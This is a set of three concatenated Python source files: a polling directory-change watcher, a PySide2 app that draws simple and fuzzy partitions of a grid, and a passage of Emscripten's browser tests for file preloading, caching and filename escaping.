"""Monitors a directory tree for changes using mtime polling."""
import os
import threading
import warnings
class MtimeFileWatcher(object):
"""Monitors a directory tree for changes using mtime polling."""
def __init__(self, directory):
self._directory = directory
self._quit_event = threading.Event()
self._filename_to_mtime = None
self._has_changes = False
self._has_changes_lock = threading.Lock()
self._watcher_thread = threading.Thread(target=self._watch_changes)
self._watcher_thread.daemon = True
def start(self):
"""Start watching a directory for changes."""
self._watcher_thread.start()
def quit(self):
"""Stop watching a directory for changes."""
self._quit_event.set()
def has_changes(self):
"""Returns True if the watched directory has changed since the last call.
start() must be called before this method.
Returns:
Returns True if the watched directory has changed since the last call to
has_changes or, if has_changes has never been called, since start was
called.
"""
with self._has_changes_lock:
has_changes = self._has_changes
self._has_changes = False
return has_changes
def _watch_changes(self):
while not self._quit_event.wait(1):
self._check_for_changes()
def _check_for_changes(self):
if self._has_changed_paths():
with self._has_changes_lock:
self._has_changes = True
def _has_changed_paths(self):
self._filename_to_mtime, old_filename_to_mtime = (
self._generate_filename_to_mtime(), self._filename_to_mtime)
return (old_filename_to_mtime is not None and
self._filename_to_mtime != old_filename_to_mtime)
def _generate_filename_to_mtime(self):
filename_to_mtime = {}
num_files = 0
for dirname, dirnames, filenames in os.walk(self._directory,
followlinks=True):
for filename in filenames + dirnames:
if num_files == 10000:
warnings.warn(
'There are too many files in your application for '
'changes in all of them to be monitored. You may have to '
'restart the development server to see some changes to your '
'files.')
return filename_to_mtime
num_files += 1
path = os.path.join(dirname, filename)
try:
mtime = os.path.getmtime(path)
except (IOError, OSError):
pass
else:
filename_to_mtime[path] = mtime
return filename_to_mtime
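# --- Illustrative usage sketch (added for documentation; not part of the original
# module): poll a directory for changes until interrupted. The directory argument
# and the 1-second sleep are arbitrary example values.
if __name__ == '__main__':
  import sys
  import time

  watcher = MtimeFileWatcher(sys.argv[1] if len(sys.argv) > 1 else '.')
  watcher.start()
  try:
    while True:
      if watcher.has_changes():
        print('change detected in watched directory')
      time.sleep(1)
  except KeyboardInterrupt:
    watcher.quit()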
|
main.py
|
import sys
from threading import Thread
from PySide2.QtWidgets import (QApplication, QPushButton, QMainWindow, QWidget, QVBoxLayout,
QHBoxLayout, QLabel, QLineEdit, QComboBox, QSplitter, QSpacerItem, QSizePolicy, QGraphicsView, QGraphicsScene)
from PySide2.QtCore import Slot, Qt, QRectF, QRect, Signal
from PySide2.QtGui import QPen, QBrush
from utils.cell import Cell
from utils.color_manager import ColorManager
from partition.partition_utils import (EuclidianDistance, ChebyshevDistance, TaxicabDistance, sign,
MonotonicStepFunction, ConstantStepFunction, SeriesStepFunction, LeftRectangularIntergate)
from partition.partition import ( FuzzyPartitionWithFixedCentersAlgorithm, SimplePartitionWithFixedCentersAlgorithm)
WINDOW_SIZE = 500
class SettingsWidget(QWidget):
def __init__(self, boardWidget, *args, **kwargs):
super().__init__(*args, **kwargs)
self._boardWidget = boardWidget
self._freeCoefficients = dict()
self._layout = self._buildSettingsLayout()
self._layout.setAlignment(Qt.AlignTop)
self.setLayout(self._layout)
@Slot()
def _onAddCenterButtonClicked(self):
if not self._xCoordinateInput.text() or not self._yCoordinateInput.text():
return
x = round(float(self._xCoordinateInput.text()) * WINDOW_SIZE)
y = round(float(self._yCoordinateInput.text()) * WINDOW_SIZE)
wasAdded = self._boardWidget.addCenter(x, y)
if not wasAdded:
return
freeCoeficientsLabel = QLabel(text='a<sub>i</sub> ({:3.3f}, {:3.3f}): '.format(
x / WINDOW_SIZE, y / WINDOW_SIZE))
self._freeCoeficientsInput = QLineEdit()
self._freeCoeficientsInput.setPlaceholderText('0')
freeCoeficientsLayout = QHBoxLayout()
freeCoeficientsLayout.addWidget(freeCoeficientsLabel)
freeCoeficientsLayout.addWidget(self._freeCoeficientsInput)
self._layout.addLayout(freeCoeficientsLayout)
self._freeCoefficients[(x, y)] = self._freeCoeficientsInput
@Slot()
def _activateFuzzyInput(self, newText):
allControls = [
self._confidenceInput,
self._precisionInput,
self._xCoordinateInput,
self._yCoordinateInput,
self._addCenterButton,
]
activator = {
'simple partition': [self._xCoordinateInput, self._yCoordinateInput, self._addCenterButton],
'fuzzy partition': [self._confidenceInput, self._precisionInput, self._xCoordinateInput, self._yCoordinateInput, self._addCenterButton,]
}
for item in activator:
if item == newText.lower():
for control in allControls:
control.setEnabled(control in activator[item])
def _buildSettingsLayout(self):
#------------------------------------Distance options------------------------------------#
self._distanceOptions = QComboBox()
self._distanceOptions.addItems(['Euclidian Distance', 'Chebyshev Distance', 'Taxicab Distance'])
distanceLayout = QVBoxLayout()
distanceLayout.addWidget(self._distanceOptions)
#----------------------------------------------------------------------------------------#
#------------------------------------Partition options------------------------------------#
self._partitionOptions = QComboBox()
self._partitionOptions.addItems(['Simple Partition', 'Fuzzy Partition'])
partitionLayout = QVBoxLayout()
partitionLayout.addWidget(self._partitionOptions)
self._partitionOptions.currentTextChanged.connect(self._activateFuzzyInput)
#-----------------------------------------------------------------------------------------#
#------------------------------------Confidence Degree------------------------------------#
self._confidenceInput = QLineEdit(enabled=True)
self._confidenceInput.setPlaceholderText('Confidence degree')
confidenceLayout = QVBoxLayout()
confidenceLayout.addWidget(self._confidenceInput)
self._precisionInput = QLineEdit(enabled=True)
self._precisionInput.setPlaceholderText('Gradient method precision')
precisionLayout = QVBoxLayout()
precisionLayout.addWidget(self._precisionInput)
#-----------------------------------------------------------------------------------------#
#------------------------------------Add center------------------------------------#
self._xCoordinateInput = QLineEdit()
self._xCoordinateInput.setPlaceholderText('x center coordinate')
self._yCoordinateInput = QLineEdit()
self._yCoordinateInput.setPlaceholderText('y center coordinate')
self._addCenterButton = QPushButton()
self._addCenterButton.setText('Add new center')
self._addCenterButton.setMinimumWidth(400)
addCentersLayout = QVBoxLayout()
addCentersLayout.addWidget(self._xCoordinateInput)
addCentersLayout.addWidget(self._yCoordinateInput)
addCentersLayout.addWidget(self._addCenterButton)
self._addCenterButton.clicked.connect(self._onAddCenterButtonClicked)
#-----------------------------------------------------------------------------------#
spacer = QSpacerItem(40, 40, QSizePolicy.Expanding, QSizePolicy.Minimum)
settingsLayout = QVBoxLayout()
settingsLayout.addLayout(partitionLayout)
settingsLayout.addLayout(distanceLayout)
settingsLayout.addLayout(confidenceLayout)
settingsLayout.addLayout(precisionLayout)
settingsLayout.addItem(spacer)
settingsLayout.addLayout(addCentersLayout)
return settingsLayout
def distance(self):
returnDistance = EuclidianDistance
if 'euclidian' in self._distanceOptions.currentText().lower():
returnDistance = EuclidianDistance
elif 'cheb' in self._distanceOptions.currentText().lower():
returnDistance = ChebyshevDistance
elif 'taxi' in self._distanceOptions.currentText().lower():
returnDistance = TaxicabDistance
return returnDistance
def partitionAlgorithm(self):
return self._partitionOptions.currentText().lower()
def precision(self):
return float(self._precisionInput.text()) if self._precisionInput.text() else 0.01
def confidence(self):
return float(self._confidenceInput.text()) if self._confidenceInput.text() else 0.0
def freeCoefficients(self):
return { center: float(freeCoefficient.text()) * WINDOW_SIZE
if freeCoefficient.text() else 0.0 for center, freeCoefficient in self._freeCoefficients.items() }
class PartitionCentralWidget(QWidget):
def __init__(self, boardWidget, settingsWidget, *args, **kwargs):
super().__init__(*args, **kwargs)
self._boardWidget = boardWidget
self._settingsWidget = settingsWidget
self._startPartitionButton = QPushButton('Start Partition')
self._paintGrayScale = QPushButton('Paint as grayscale')
self._paintGrayScale.setEnabled(False)
self._startPartitionButton.clicked.connect(self._onStartPartitionButtonClicked)
self._paintGrayScale.clicked.connect(self._onPaintGrayScaleButtonClicked)
self._splitter = QSplitter(Qt.Horizontal)
self._splitter.addWidget(self._boardWidget)
self._splitter.addWidget(self._settingsWidget)
mainLayout = QVBoxLayout()
mainLayout.addWidget(self._splitter)
mainLayout.addWidget(self._startPartitionButton)
mainLayout.addWidget(self._paintGrayScale)
self.setLayout(mainLayout)
@Slot()
def _onStartPartitionButtonClicked(self):
self._startPartitionButton.setEnabled(False)
partitionAlgorithm = self._settingsWidget.partitionAlgorithm()
if 'simple' in partitionAlgorithm.lower():
self._boardWidget.startSimplePartition(
self._settingsWidget.distance(), self._settingsWidget.freeCoefficients())
else:
self._boardWidget.startFuzzyPartition(
self._settingsWidget.distance(),
self._settingsWidget.confidence(),
self._settingsWidget.freeCoefficients(),
self._settingsWidget.precision())
self._startPartitionButton.setEnabled(True)
self._paintGrayScale.setEnabled(True)
@Slot()
def _onPaintGrayScaleButtonClicked(self):
self._paintGrayScale.setEnabled(False)
self._startPartitionButton.setEnabled(False)
self._boardWidget.toGrayScale()
self._startPartitionButton.setEnabled(True)
class BoardWidget(QGraphicsView):
CELL_CENTER_COLOR = Qt.black
CELL_SIMPLE_COLOR = Qt.white
CELL_SIMPLE_GRAY_COLOR = Qt.gray
CELL_BOUNDS_COLOR = Qt.black
update_progress = Signal(object)
def __init__(self, size, cellSize, application, *args, **kwargs):
super().__init__(*args, **kwargs)
self._application = application
self._windowSize = size
self._cellSize = cellSize
self._board = dict()
self._colors = dict()
self._scene = QGraphicsScene()
self.setScene(self._scene)
self.setViewportUpdateMode(QGraphicsView.FullViewportUpdate)
self.setFixedSize(self._windowSize * 1.05, self._windowSize * 1.05)
self.update_progress.connect(self.updateProgress)
for cellX in range(0, self._windowSize, self._cellSize):
for cellY in range(0, self._windowSize, self._cellSize):
self._board[(cellX, cellY)] = Cell(color=self.CELL_SIMPLE_COLOR)
self.updateColorAt((cellX, cellY))
def updateColorAt(self, point):
rect = QRectF(point[0], point[1], self._cellSize, self._cellSize)
self._scene.invalidate(rect)
self._scene.addRect(rect, QPen(Qt.black), QBrush(self._board[point].color))
def addCenter(self, x, y):
if (x, y) in self._board.keys():
cell = self._board[(x, y)]
if cell.isCenter:
return False
cell.isCenter = True
cell.color = self.CELL_CENTER_COLOR
self.updateColorAt((x, y))
return True
return False
def getExtraneousAdjecements(self, x, y):
adjecements = []
if (x < self._cellSize or x + self._cellSize >= self._windowSize):
return adjecements
if (y < self._cellSize or y + self._cellSize >= self._windowSize):
return adjecements
if (self._board[(x, y)].color == self.CELL_BOUNDS_COLOR):
return adjecements
checkedColor = self._board[(x, y)].color
for xDelta in [0, self._cellSize, -self._cellSize]:
for yDelta in [0, self._cellSize, -self._cellSize]:
candidate = self._board[(x + xDelta, y + yDelta)]
if (candidate.previousColor != checkedColor and candidate.color != self.CELL_BOUNDS_COLOR):
adjecements.append((x + xDelta, y + yDelta))
return adjecements
def forEachPoint(self, callback):
for x in range(0, self._windowSize, self._cellSize):
for y in range(0, self._windowSize, self._cellSize):
callback(x, y)
def savePrevColorAndGrayifyNeutralCells(self, x, y):
self._board[(x, y)].previousColor = self._board[(x, y)].color
if (self._board[(x, y)].color == self.CELL_SIMPLE_COLOR):
self._board[(x, y)].color = self.CELL_SIMPLE_GRAY_COLOR
self.updateColorAt((x, y))
def markBoundsAsBlack(self, x, y):
adjecements = self.getExtraneousAdjecements(x, y)
for point in adjecements:
if (self._board[point].color != self.CELL_SIMPLE_GRAY_COLOR):
self._board[point].color = self.CELL_BOUNDS_COLOR
self.updateColorAt(point)
def markRelatedPointAsWhite(self, x, y):
if (self._board[(x, y)].color != self.CELL_SIMPLE_GRAY_COLOR and self._board[(x, y)].color != self.CELL_BOUNDS_COLOR):
self._board[(x, y)].color = self.CELL_SIMPLE_COLOR
self.updateColorAt((x, y))
def toGrayScale(self):
self.forEachPoint(self.savePrevColorAndGrayifyNeutralCells)
self.forEachPoint(self.markBoundsAsBlack)
self.forEachPoint(self.markRelatedPointAsWhite)
@Slot(object)
def updateProgress(self, payload):
point = payload[0]
center = payload[1]
if center:
self._board[point].color = self._colors[center]
self.updateColorAt(point)
def pointCalculatedCallback(self, point, center):
self.update_progress.emit((point, center))
def startSimplePartition(self, distance, freeCoefficients):
self._clearBoard()
centers = [ point for point in self._board.keys() if self._board[point].isCenter]
board = [ point for point in self._board.keys()]
partition = SimplePartitionWithFixedCentersAlgorithm(
board, centers, freeCoefficients, distance, self.pointCalculatedCallback)
self._colors = dict(zip(centers, ColorManager.GetRandomColors(len(centers))))
thread = Thread(target = partition.calculatePartition)
thread.start()
def startFuzzyPartition(self, distance, confidenceDeegre, freeCoefficients, precision):
self._clearBoard()
centers = [ point for point in self._board.keys() if self._board[point].isCenter]
board = [ point for point in self._board.keys()]
partition = FuzzyPartitionWithFixedCentersAlgorithm(
board, centers, SeriesStepFunction(25), confidenceDeegre, freeCoefficients, distance, self.pointCalculatedCallback, precision)
self._colors = dict(zip(centers, ColorManager.GetRandomColors(len(centers))))
thread = Thread(target = partition.calculatePartition)
thread.start()
def _clearBoard(self):
for point, cell in self._board.items():
if not cell.isCenter:
cell.color = self.CELL_SIMPLE_COLOR
self.updateColorAt(point)
if __name__ == '__main__':
application = QApplication(sys.argv)
mainWindow = QMainWindow()
mainWindow.setWindowTitle('Partition')
boardWidget = BoardWidget(WINDOW_SIZE, 5, application)
settingsWidget = SettingsWidget(boardWidget)
centralWidget = PartitionCentralWidget(boardWidget, settingsWidget)
mainWindow.setCentralWidget(centralWidget)
mainWindow.show()
sys.exit(application.exec_())
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, require_v8
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
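# Note (added for documentation): the helper above is intended to be launched in a
# separate process (the module imports multiprocessing for this purpose), so that a
# compiled test page can issue Range and OPTIONS requests against localhost:11111
# while the main process drives the browser; the exact caller is outside this excerpt.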
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
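# Note (added for documentation): the `_parameterize` attribute set by the two
# decorators above is consumed by the test harness in common.py, which expands each
# decorated method into one test per entry (an unsuffixed variant plus a
# 'wasmfs' / 'wasm2js' variant); that expansion machinery is outside this excerpt.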
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL', '-s', 'EXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to avoid confusion with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
